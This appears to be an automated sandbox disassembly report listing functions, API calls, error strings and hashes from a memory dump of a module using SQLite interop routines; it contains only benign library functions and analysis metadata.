SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011AC1,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,00000000,?,00000000,?,?,?,?,6BC8AEB6), ref: 6BC859CA

Strings

%s at line %d of [%.10s], xrefs: 6BC858DF, 6BC859C3
database corruption, xrefs: 6BC858DA, 6BC859BE
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC858D0, 6BC859B4

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 4544370086385b5e467f112dfcb0f1ef7ed47b666ce25c5fdbea827f204229b3
Instruction ID: 9746525236e325c020f51b485b114e14cd4a300792127feb6ca7edc8763c8666
Opcode Fuzzy Hash: 4544370086385b5e467f112dfcb0f1ef7ed47b666ce25c5fdbea827f204229b3
Instruction Fuzzy Hash: 2A71D774F11115AFDB00CF68D881A9ABBB5FF48318F1080A9D91ADB341E775EA52CBE1

Function 6BC56840 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 6BC568B5, 6BC569AF
database corruption, xrefs: 6BC568B0, 6BC569AA
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC568A6, 6BC569A0

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 0-2469029621
Opcode ID: 18da2738b8620503a00d9abedce2078214c2cd7b0d4279bbaa1131b37a283339
Instruction ID: 7a8471c2925adc8b3bdda3185af568c5985d1c09873e1bce8ec40ae2e0c52e0c
Opcode Fuzzy Hash: 18da2738b8620503a00d9abedce2078214c2cd7b0d4279bbaa1131b37a283339
Instruction Fuzzy Hash: D671A472E146559BDB04CF69C8806AEBBB0FF41314F0481A9E864AB245F738DB74CBA5

Function 6BC47E50 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC47EFB
SI5b914c29cf5a7984.SQLITE.INTEROP(?), ref: 6BC47F33
SI905dcc543d48caab.SQLITE.INTEROP(?,SHA3 size should be one of: 224 256 384 512,000000FF), ref: 6BC47F69
SIffb8076c269e2a85.SQLITE.INTEROP(?,?,?), ref: 6BC47FA3

Strings

SHA3 size should be one of: 224 256 384 512, xrefs: 6BC47F63

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I5b914c29cf5a7984.I905dcc543d48caab.Iffb8076c269e2a85._memset
String ID: SHA3 size should be one of: 224 256 384 512
API String ID: 800791286-3613959757
Opcode ID: 818b1a1dddf26f2852a59ca8865849b07f80bcf670193665861c71e4267b3a98
Instruction ID: 8a974ebb26d4642a63e6e4ba3ad95208aa113aa5bf6b1b93c22504e701de712a
Opcode Fuzzy Hash: 818b1a1dddf26f2852a59ca8865849b07f80bcf670193665861c71e4267b3a98
Instruction Fuzzy Hash: 6E5104B2A253018FE310CF28C941A5BB3E5EBC5314F144A6AE89587281F739EB48D792

Function 6BC3DFD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC3E050
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC3E0B2
__localtime64_s.LIBCMT ref: 6BC3E0F5
__allrem.LIBCMT ref: 6BC3E171

Strings

local time unavailable, xrefs: 6BC3E116

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem__localtime64_s
String ID: local time unavailable
API String ID: 88041608-3313036412
Opcode ID: 7d60ef94cd936b47be769122f6e39df0083cb7c3e67ee2bc4e066642074ff6e6
Instruction ID: 125e3096c988587ee88483c8d304d324759b254b5dc2947e510f44227865dacd
Opcode Fuzzy Hash: 7d60ef94cd936b47be769122f6e39df0083cb7c3e67ee2bc4e066642074ff6e6
Instruction Fuzzy Hash: 1B518B716187418FD714CF68C881A1FFBE5FB88354F504A2EF59987290EB78EA04CB92

Function 6BC52870 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 154COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 6BC52A24
unable to delete/modify collation sequence due to active statements, xrefs: 6BC52904
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC52A15
misuse, xrefs: 6BC52A1F

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 0-1278717071
Opcode ID: 5800c1b3c8dbdf0e0e6555dae307ee3731c1ad4bf5b74d1413d12eb6ab721c42
Instruction ID: 614e255c38960f2a409dc874a8c9f464a2fc5eb931cea57f291fc9b0dbb78135
Opcode Fuzzy Hash: 5800c1b3c8dbdf0e0e6555dae307ee3731c1ad4bf5b74d1413d12eb6ab721c42
Instruction Fuzzy Hash: B3512B726242059BD710CF19D891B96F7E0FB44324F048199ECA88F391E739E670CBA5

Function 6BC5C710 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC5C7B4
SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000353F9,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,6BC6459C), ref: 6BC5C812

Strings

%s at line %d of [%.10s], xrefs: 6BC5C80B
database corruption, xrefs: 6BC5C806
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5C7FC

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d._memset
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 3064812586-2469029621
Opcode ID: 17af645f2701c0d4d8417aef2993e03448f5f07c07889aebed609aa3660e51b0
Instruction ID: 1a5b8fc50d05ee706f1444929fdfe35c7aa55266615fd90255e2600a373d6dbd
Opcode Fuzzy Hash: 17af645f2701c0d4d8417aef2993e03448f5f07c07889aebed609aa3660e51b0
Instruction Fuzzy Hash: 8C41B4B2A142108FCB14CF28D88196B77A9FF84714F0445AEED499B346F735DA24CBE1

Function 6BC48FB0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

SI8b0d9e6837e61abc.SQLITE.INTEROP ref: 6BC49032
SI8b0d9e6837e61abc.SQLITE.INTEROP ref: 6BC49060
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC490BE

Strings

JSON cannot hold BLOB values, xrefs: 6BC490A3
null, xrefs: 6BC4900F

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I8b0d9e6837e61abc.$Iaa0f8e0c251cfd1d.
String ID: JSON cannot hold BLOB values$null
API String ID: 837155543-1864232943
Opcode ID: 0a188520bd39e63d2855cd2e5b06df400231f68124670c08fb137b8b0077d7b7
Instruction ID: dcffc468be5f8c2c787beb90b58a05ea0139b14de74e2c07e6722d95b989a0f5
Opcode Fuzzy Hash: 0a188520bd39e63d2855cd2e5b06df400231f68124670c08fb137b8b0077d7b7
Instruction Fuzzy Hash: 7A3128B2A107104FD730CF29EC81757B3E4AB49228F0446BED96AC7642F779E7188792

Function 6BC2F0E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

SI5b914c29cf5a7984.SQLITE.INTEROP(?), ref: 6BC2F10E
SIdb45e174afb28e2c.SQLITE.INTEROP(%.*f,00000000), ref: 6BC2F1CD
SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC2F1DF
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000,?), ref: 6BC2F204

Strings

%.*f, xrefs: 6BC2F1C8

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I1bf8975e567ea97a.I5b914c29cf5a7984.Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
String ID: %.*f
API String ID: 1792259931-1338106815
Opcode ID: ba3f496f721f9b9c45c655e07b27cb069daf4f29c519aa3adf12bf48d389a068
Instruction ID: 4a275992a1e39378a4c8ed7ed0b40ee1e8e578d23c10a289224afb89654fda48
Opcode Fuzzy Hash: ba3f496f721f9b9c45c655e07b27cb069daf4f29c519aa3adf12bf48d389a068
Instruction Fuzzy Hash: 78318671D251185BDB016FA8E90539A77B4BF43745F4001C9EC84AA241FB3D8B55CBE2

Function 6BC6A3B0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002ACAC,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,6BC6D789,?,?,00000000,00000000,00000000), ref: 6BC6A3DA

Strings

%s at line %d of [%.10s], xrefs: 6BC6A3D3
unknown database: %s, xrefs: 6BC6A43E
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6A3C4
misuse, xrefs: 6BC6A3CE

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse$unknown database: %s
API String ID: 2981141233-630002017
Opcode ID: 0fdfb855e6b8e07d4dbeb6b649d5d1b3fb071468e46c611763346546e2e93d1a
Instruction ID: 8b9471963a4071365cb9841e2177658b749f46b8f03465f08c533a699cec37bc
Opcode Fuzzy Hash: 0fdfb855e6b8e07d4dbeb6b649d5d1b3fb071468e46c611763346546e2e93d1a
Instruction Fuzzy Hash: E331F771A152215BDB109F69DCC9F677758EB817A4F0401B9FD199F282F73CCA1087A1

Function 6BCDE8C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 6BCCB650: SIdb45e174afb28e2c.SQLITE.INTEROP(%z%s"%w"."%w"."%w" IS NOT "%w"."%w"."%w",00000000,6BD06F50,?,?,?,?,?,?,?,?,?,6BCDE8E3,?,?,?), ref: 6BCCB68B
Part of subcall function 6BCCB650: SIdb45e174afb28e2c.SQLITE.INTEROP(6BD08268,?,?,?,6BCDE8E3,?,?,?,?,?,00000000,6BCE21D9,?,?), ref: 6BCCB6AB

SIdb45e174afb28e2c.SQLITE.INTEROP(SELECT * FROM "%w"."%w", "%w"."%w" WHERE %s AND (%z),?,?,?,?,6BCE21D9,00000000,?,?,?,?,00000000,6BCE21D9,?,?), ref: 6BCDE901
SIa364946505687432.SQLITE.INTEROP(?), ref: 6BCDE94A
SIa364946505687432.SQLITE.INTEROP(?,00000017,?), ref: 6BCDE962
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BCDE97F

Strings

SELECT * FROM "%w"."%w", "%w"."%w" WHERE %s AND (%z), xrefs: 6BCDE8FC

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Idb45e174afb28e2c.$Ia364946505687432.$Iaa0f8e0c251cfd1d.
String ID: SELECT * FROM "%w"."%w", "%w"."%w" WHERE %s AND (%z)
API String ID: 2723302667-1366569373
Opcode ID: 1d1acaee876aca2f8c1719ad35fcaf345f6c9a8a6af5dafb6a27a5b52e3b2f82
Instruction ID: 2a949f7a3c34de1ce13ba985f77a9c4f72280c3d5268ad1483d917184206facc
Opcode Fuzzy Hash: 1d1acaee876aca2f8c1719ad35fcaf345f6c9a8a6af5dafb6a27a5b52e3b2f82
Instruction Fuzzy Hash: 642195B5A11204ABDB10DF68DC41F6BB7B8DF84714F1441A9F9599B341F735EA00C7A2

Function 6BC5A830 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0001131D,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,6BC60B7D), ref: 6BC5A861
SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0001132B,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,6BC60B7D), ref: 6BC5A8EF

Strings

%s at line %d of [%.10s], xrefs: 6BC5A85A, 6BC5A8E8
database corruption, xrefs: 6BC5A855, 6BC5A8E3
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5A84B, 6BC5A8D9

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: f33a84e0b7273f33b8e22522795b01f00019a349f48d004817918bee16fb4058
Instruction ID: 6fd6fbfb4de18568826766a0c7d9943ef509577e511471a9c2dfbecc90953b9d
Opcode Fuzzy Hash: f33a84e0b7273f33b8e22522795b01f00019a349f48d004817918bee16fb4058
Instruction Fuzzy Hash: 9D216B722147500BC324EF3AD941B93BBF0DF84321B04456EE5DACBA86E728E5248775

Function 6BC55F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000000), ref: 6BC55F88
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000070B3,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC55FDD

Strings

%s at line %d of [%.10s], xrefs: 6BC55FD6
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC55FC7
misuse, xrefs: 6BC55FD1

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: CriticalI769271af19a2299d.InitializeSection
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2812754129-160653349
Opcode ID: a1631da08afe0d98e40984db09fca2fa8c137afb22f1f9a8f559d40c866e96d5
Instruction ID: 67467d76653d31c9bdce7a1e044411973050f89b1c0b816333238d10fc97f06d
Opcode Fuzzy Hash: a1631da08afe0d98e40984db09fca2fa8c137afb22f1f9a8f559d40c866e96d5
Instruction Fuzzy Hash: 8921C972A142008FEB009F6CAC06B4677E8DB45325F45427AFE1CDB251F738D635C6AA

Function 6BC54670 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000112FD,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,00000000,00000000), ref: 6BC54711

Strings

%s at line %d of [%.10s], xrefs: 6BC5470A, 6BC54733
database corruption, xrefs: 6BC54705, 6BC5472E
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC546FB, 6BC54724

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: ebd61515a1c7e6e030ade54356886666d3de09c32b356338e8818ec24211b9e1
Instruction ID: cd6d9c92533bc97fdd90dbd3632be2b0c7df02db0654cc9c4b7a859c4bfe51d5
Opcode Fuzzy Hash: ebd61515a1c7e6e030ade54356886666d3de09c32b356338e8818ec24211b9e1
Instruction Fuzzy Hash: 0C213871E402159BC710CF59CC40AAFB3F0EF90715F104199E8859B745F7395666C7A1

Function 6BCC5A50 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000079BC,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,?,?), ref: 6BCC5A89

Strings

%s at line %d of [%.10s], xrefs: 6BCC5A82
F, xrefs: 6BCC5AC1
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCC5A73
misuse, xrefs: 6BCC5A7D

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$F$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-3876738975
Opcode ID: d46e3b0c263b7ed6413b758753c4dc114e912d5b7499605f639390cc7db2c663
Instruction ID: 4f61b882f781d7eef05cf3f95e5f31746b23b224653ab985a7fc8a2fa34724b2
Opcode Fuzzy Hash: d46e3b0c263b7ed6413b758753c4dc114e912d5b7499605f639390cc7db2c663
Instruction Fuzzy Hash: 4A21A471B183445BC600DF29D88245FBBE4EF88228F40466EFA8DA7240F7389A04CBD7

Function 6BC55970 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC559AF
